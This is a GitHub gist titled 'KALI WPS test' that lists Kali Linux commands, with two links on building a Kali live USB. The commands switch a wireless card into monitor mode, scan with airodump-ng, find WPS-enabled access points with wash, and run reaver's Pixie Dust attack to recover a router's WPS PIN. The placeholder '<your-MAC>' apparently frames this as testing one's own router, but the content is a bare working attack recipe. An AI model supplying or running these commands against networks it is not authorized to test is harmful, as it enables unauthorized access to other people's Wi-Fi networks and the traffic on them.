Skip to content

Instantly share code, notes, and snippets.

@a-mishra
Forked from CHEF-KOCH/kali_wps.txt
Created November 30, 2016 06:25
Show Gist options
  • Select an option

  • Save a-mishra/eb80afac9944cddc07c9eec52a886527 to your computer and use it in GitHub Desktop.

Select an option

Save a-mishra/eb80afac9944cddc07c9eec52a886527 to your computer and use it in GitHub Desktop.
KALI WPS test
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airodump-ng wlan0
wash -i wlan0 -C | grep <SSID>
reaver -i wlan0 -b <your-MAC> -K 1 -w -vv
Research:
* http://docs.kali.org/downloading/kali-linux-live-usb-install
* http://sourceforge.net/projects/win32diskimager/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment